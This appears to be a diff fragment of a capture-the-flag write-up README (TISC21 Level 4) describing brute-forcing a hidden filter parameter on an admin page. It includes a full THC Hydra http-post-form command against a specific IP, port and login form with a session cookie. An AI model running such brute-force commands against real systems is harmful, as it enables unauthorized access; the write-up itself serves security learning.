kokmingchoy/TISC21/Level_4/README.md

 - brute-forcing strings of 1 to 4 characters, pre-pended with the prefix characters "is"
 - common English words of 1 to 5 characters, pre-pended with the prefix characters "is"

-The brute-force guessing of valid _filter_ values was performed using **THC Hydra** to try different values for the _filter_ parameter.
+The brute-force guessing of valid _filter_ values was performed using multiple runs of **THC Hydra** to try different values for the _filter_ parameter.
 A valid session cookie must be included in the final **hydra** command, like so:

 ```bash
 hydra -l admin -P words.lst -s 18926 178.128.218.40 http-post-form "/landing_admin.php:filter=is^PASS^:0 results:H=Cookie\: PHPSESSID=__session_cookie__"